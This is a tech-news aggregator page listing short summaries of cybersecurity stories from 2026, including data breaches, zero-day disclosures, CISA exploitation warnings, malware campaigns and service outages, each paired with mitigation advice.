Insights, Guides & Product Strategy
Learn how teams discover, evaluate, and ship faster with the right tools.
UN food agency discloses breach affecting 600,000 Gaza households
The United Nations’ World Food Programme disclosed a cyberattack on its Gaza self-registration platform, potentially exposing the personal data of about 600,000 Palestinian households, including names, IDs, phone numbers, and registration locations. The platform is temporarily suspended as security measures are strengthened; beneficiaries are advised to ignore suspicious requests, and aid distribution continues while the investigation proceeds.
Microsoft Blames Caching Issue for Unexpected Windows Driver Updates
Microsoft fixed a misconfiguration in the Windows Update caching service that temporarily dropped device enrollment data, causing some Windows devices with auto-update restrictions to install driver updates without notice. The affected drivers were Microsoft-approved and posed no security risk. The issue reportedly affected tens of thousands of devices and could disrupt peripherals, but has been resolved with an updated service cache and enrollment status, and a review to prevent recurrence.
French and Spanish Authorities Dismantle Fake ID Marketplace Used by Migrant Smugglers
French and Spanish authorities have dismantled an online marketplace selling forged identity and administrative documents to migrant-smuggling networks across the European Union. In Alicante, on May 27, a suspect was arrested and document-production equipment along with about 800 counterfeit European IDs were seized from an apartment rented under a false name. The platform allegedly supplied forged documents to help smugglers evade border controls, fraudulently obtain residence rights, and move within the Schengen Area. Europol says document fraud underpins migrant smuggling, a concern reflected in the EU’s new European Centre Against Migrant Smuggling (ECAMS) and the 2025 EU Serious and Organised Crime Threat Assessment, which call for stronger intelligence sharing and cross-border investigations.
Chinese Hackers Use New Atlas RAT Malware in European Cyberattacks
TA4922, a Chinese-speaking cybercrime group, has expanded from East Asia into Europe, targeting Germany, Italy, the United Kingdom, and South Africa with the Atlas RAT and a broader set of loaders. The operation is financially motivated but shows potential for surveillance, delivering payloads via tailored phishing lures and messaging apps such as WhatsApp, LINE, and Teams. Atlas RAT provides capabilities including file theft, keylogging, screen and webcam recording, and stealth features, while RomulusLoader, SilentRunLoader, and Winos4.0 (ValleyRAT) enable further payloads and remote access. Proofpoint notes TA4922 conducts more unique campaigns than any other tracked actor, with high tempo and diverse objectives that could attract espionage groups.
New HTTP/2 Bomb DoS Attack Crashes Web Servers in Under a Minute
A new DoS technique dubbed HTTP/2 Bomb can crash major web servers in seconds from a single machine by combining HPACK header compression amplification with HTTP/2 flow-control stalling (Slowloris-style). Discovered with OpenAI's Codex under Calif researchers, it can exhaust tens of gigabytes of RAM within seconds on a 100 Mbps link; in tests, Envoy hit 32 GB in ~10 seconds, Apache httpd ~18 seconds, Nginx ~45 seconds, and IIS ~45 seconds (64 GB RAM). Patches exist for nginx (1.29.8, max_headers) and Apache httpd (mod_http2 2.0.41, CVE-2026-49975); patches for IIS, Envoy, and Pingora are not yet available. Mitigations include disabling HTTP/2 where feasible or placing a proxy/firewall that enforces hard header-count limits. PoC exploits are public, and full technical details will be disclosed at the Real World AI Security conference.
CISA warns of active attacks exploiting Android, Linux bugs
CISA warns of active exploitation of two high-severity bugs: CVE-2025-48595 in Android (affecting Android 14–16; exploits require no user interaction; limited in-the-wild activity; patched in June 2026) and CVE-2022-0492 in the Linux kernel (cgroups v1; local privilege escalation and possible container escape; patches available for multiple kernel versions). Federal agencies must apply updates by June 5, 2026, and KEV serves as a warning to critical infrastructure and large organizations; neither flaw is currently flagged as ransomware-exploited.
What 345 Days of Untested Exposure Looks Like at a Bank
Annual penetration testing creates a 345-day gap of unvalidated exposure in modern banks, a risk highlighted by recent breaches and threat reports. A real-world finding shows a vendor-hosted mortgage portal exposing tenant data through an unauthenticated API, enabling possible fraudulent loan submissions. Regulators already expect testing to follow change, not just on a yearly cadence, making continuous external testing the recommended remedy to close the security gap in financial services.
Acer working to patch max severity zero-days in Wave 7 routers
Acer is patching two critical zero-day vulnerabilities in its Wave 7 mesh routers (firmware 1.01.000055 or earlier). CVE-2026-49200 could allow unauthenticated remote access to plaintext credentials stored in log archives via the acer_cgi.log file, while CVE-2026-49201 stems from a hardcoded AES key in upload.cgi that could enable persistent backdoor access. Patches are not yet available, but Acer says fixes are planned for deployment by the end of June 2026. Until then, users should disable remote management or restrict Internet remote access to trusted IPs and follow the firmware-update steps once updates are released.
Police dismantles 9 crime groups in illegal streaming crackdown
European and international law enforcement have dismantled nine organized crime groups behind illegal streaming in Operation KRATOS 2, coordinated by Bulgaria with Europol and spanning 13 countries. The seven-month crackdown led to 29 arrests, 86 identified suspects, 148 house searches, and ongoing investigations (72), with authorities removing more than 27,000 illegal streaming URLs and flagging hundreds of thousands of infringing items (including 18,000 IPs and 4,370 domains). Investigators say the networks separated consumer sites from hosting servers to evade detection, targeting the wider criminal ecosystem and warning users of cybersecurity risks such as malware and data theft. The operation follows earlier anti-piracy efforts including KRATOS in 2024, Operation Switch Off, and CINEMAGOAL.
Google Adds Android Protection Against AI Deepfake Scam Calls
Google announces a new Android feature, “fake call detection,” to counter AI deepfake scam calls on Android 12+ (starting with Pixel), enabled by default. The system uses Phone by Google, Contacts, and Google Messages with RCS to automatically verify calls via a real-time, encrypted signal; if no signal is received, the recipient’s device pings the caller’s actual device to confirm, and a warning appears if the call isn’t genuine. The feature addresses spoofed numbers and voice cloning, highlighting that caller ID is no longer reliable and advising users to use Phone by Google as their default dialer. This rollout expands Android’s in-call scam protections, with prior expansion to banking apps, amid FTC and INTERPOL warnings about impersonation fraud.
VS Code zero-day lets hackers steal GitHub tokens in one click
Security researchers disclosed a Visual Studio Code zero-day that lets attackers steal GitHub OAuth tokens with a single click by abusing github.dev. A proof-of-concept shows an attacker installing a malicious extension via VS Code’s webview to capture the token and grant full access to all repositories the victim can access. There is no patch or CVE yet; users should mitigate by clearing cookies and on-device data for github.dev and watching for extension sign-in prompts, while the disclosure was made publicly after concerns with Microsoft’s security response process.
Over 116,000 Minecraft Systems Infected in WeedHack Malware Campaign
A large-scale WeedHack malware campaign has infected over 116,000 Minecraft systems since January, spreading through malicious mods, clients, and utilities promoted on YouTube and via SEO poisoning. WeedHack operates as a malware-as-a-service, offering a dashboard to view stolen data and a payload builder, with a free tier that steals session IDs, cookies, and passwords across multiple apps and browsers, plus paid tiers adding remote access, keylogging, webcam access, and file management. The campaign relies on more than 240 distribution URLs and 3,820 unique malicious JAR files, with victims mainly in the United States, Germany, India, and the UK. Many clients appear to be teenagers or young adults who use WeedHack’s tools to harass others. The article urges Minecraft players to download mods only from official sources and to consider the Minecraft Marketplace for safer alternatives.
AI-built ransomware toolkit automates EDR evasion, AD discovery
An AI-built ransomware toolkit automates Active Directory discovery and evasion of endpoint detection and response (EDR) tools, accelerating cybercrime. The framework employs multiple AI agents to develop, test, and refine modular Windows payloads with encryption and evasion techniques, using components like Cobalt Strike profiles, a Telegram-based C2, a Python payload loader, and a Cloudflare front-end. Sophos says the tool has been tested against EDRs from Sophos, CrowdStrike, and Microsoft, and notes the workflow is human-driven despite AI involvement. While it may resemble a red-team framework, researchers confirm it is used for criminal ransomware activity, with AI speeding up development rather than operating autonomously in victims’ environments.
Microsoft Exchange Online outage causes email delays, failures
Microsoft is investigating a widespread Exchange Online outage impacting mail flow in North America and Germany, causing significant email delays and delivery failures. The incident (EX1331830) was first acknowledged at 10:33 ET as engineers review reports to determine the root cause and next steps, with some messages remaining undelivered for over an hour. This disruption affects users’ ability to send and receive email.
CISA flags two-year-old Oracle flaw as actively exploited in attacks
CISA has classified the two-year-old Oracle WebLogic Server flaw CVE-2024-21182 as actively exploited and added it to the Known Exploited Vulnerabilities catalog. Federal agencies were ordered to patch WebLogic servers by June 4, 2026, under BOD 22-01, with a strong urging for private-sector defenders to patch promptly. The flaw affects WebLogic versions 12.2.1.4.0 and 14.1.1.0.0 and can be exploited remotely by unauthenticated attackers, potentially giving access to sensitive data or full server control. With about 1,592 exposed online according to Shodan, the guidance emphasizes applying vendor mitigations or discontinuing the product if mitigations are unavailable.
Google fixes one actively exploited Android zero-day, 124 flaws
Google’s June 2026 Android security patches fix 124 vulnerabilities, including an actively exploited zero-day (CVE-2025-48595) that can enable remote code execution and privilege escalation on Android 14+. The updates also address 18 critical flaws across System, Framework, and Qualcomm components and are released in two patch levels (2026-06-01 and 2026-06-05). Pixel devices will receive the updates first, with other OEMs likely to take longer. The patching continues a trend of prior zero-days such as CVE-2025-48633, CVE-2025-48572, and CVE-2026-21385 being addressed in earlier updates.
Hackers hijack thousands of sites for ClickFix and FakeUpdate attacks
Researchers link the DriveSurge group to massive campaigns that hijack thousands of sites to deliver malware via ClickFix and FakeUpdates. Using the open-source Traffic Distribution System zTDS, they tailor lures to visitors and redirect them to malicious payloads, including fake browser updates and PowerShell-based commands. The operation, which also targets macOS, acts as an initial access broker (PPI) and relies on dozens of malicious injection domains and fingerprints. Users are advised to download updates only from official app settings and to ignore unfamiliar update prompts.
WordPress malware campaign hides payloads in Steam profiles
GoDaddy researchers warn of a WordPress malware campaign that has infected nearly 2,000 sites since mid-2025 by embedding payloads in Steam Community profile comments. The attacker uses invisible Unicode characters to encode a payload that constructs a URL to a malicious JavaScript script, hiding the C2 channel on Steam to blend with legitimate traffic. The final stage delivers a backdoor that accepts base64-encoded PHP code via POST when a specific authentication cookie is present. Potential infection vectors include stolen admin credentials, compromised FTP/SFTP, vulnerable plugins/themes, or supply-chain compromises. Defense guidance includes watching for Steam URLs, suspicious JavaScript injections, outbound connections to Steam, and indicators like invisible characters or unusual cached entries; responders should restore from a known-good backup or perform thorough manual cleanup to prevent reinfection.
Microsoft confirms outage affecting MFA, My Sign-Ins platform
Microsoft confirmed an ongoing outage affecting users trying to set up Multi-Factor Authentication and access mysignins.microsoft.com, with reports of 504 Gateway Timeout errors. The company has switched to alternate infrastructure to mitigate the impact, is monitoring service health, and is exploring further mitigation options; the affected regions have not been specified, and the incident began around 5:00 AM ET.
Microsoft fixes KB5089549 Windows security update install issues
Microsoft has resolved the Windows 11 May 2026 security update install failures (KB5089549) caused by insufficient free space on the EFI System Partition, which produced 0x800f0922 errors and rollback messages. The fix is included in the KB5089573 preview cumulative update and will be delivered to all users with the June Patch Tuesday updates; users should install the latest update to avoid workarounds. For those who cannot install the May 26, 2026 updates yet, Known Issue Rollback provides a mitigation, and IT admins can deploy rollback via Group Policy.
Showing 20 of 314 articles
Stay Updated
Get weekly insights on developer tools, product updates, and tech guides straight to your inbox.